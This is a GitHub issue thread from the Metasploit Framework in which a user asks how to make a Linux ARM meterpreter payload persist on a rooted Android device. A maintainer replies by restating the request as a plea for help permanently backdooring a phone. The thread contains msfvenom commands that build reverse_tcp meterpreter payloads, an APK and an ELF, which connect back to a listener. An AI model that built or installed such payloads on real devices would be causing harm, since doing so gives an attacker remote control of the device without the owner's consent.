### ISSUE TITLE
Linux Payloads on Android

### ISSUE THREAD

**Issue by NightRaidGamer** [rapid7/metasploit-framework#15814]
i generate a payload for dalvik android 
msfvenom -p android/meterpreter/reverse_tcp -f raw LHOST=192.168.1.99 LPORT=4444 R > app.apk
so i installed apk and got meterpreter
meterpreter > sysinfo
Computer    : localhost
OS          : Android 8.1.0 - Linux 4.4.126 (armv7l)
Meterpreter : dalvik/android
now I'm going to generate a payload based on my device's architecture.
msfvenom -p linux/armle/meterpreter/reverse_tcp -f elf LHOST=192.168.1.99 LPORT=4444 R > app.elf

but i don't know how to install it, it's not as simple as an apk, could someone explain to me how i can install this elf file? I have root access, I tried to put it in the /system/etc/init folder, but the file doesn't start...

the question is when I use "Android 'su' Privilege Escalation" I get a meterpreter linux shell on android, but how to get that without using this su module? and also this module is a temporary linux meterpreter shell, i wish i could install permanent like we do with an apk...

**Comment by bcoles** [comment]
I've taken the liberty of translating the above should someone wish to field this query.

* What is the difference between an ELF file and an APK file?
* How do I execute an ELF file?
* How do I run the "Android 'su' Privilege Escalation" without running the "Android 'su' Privilege Escalation" module?
* How do I permanently backdoor an Android device? Android version and hardware manufacturer/model unknown.
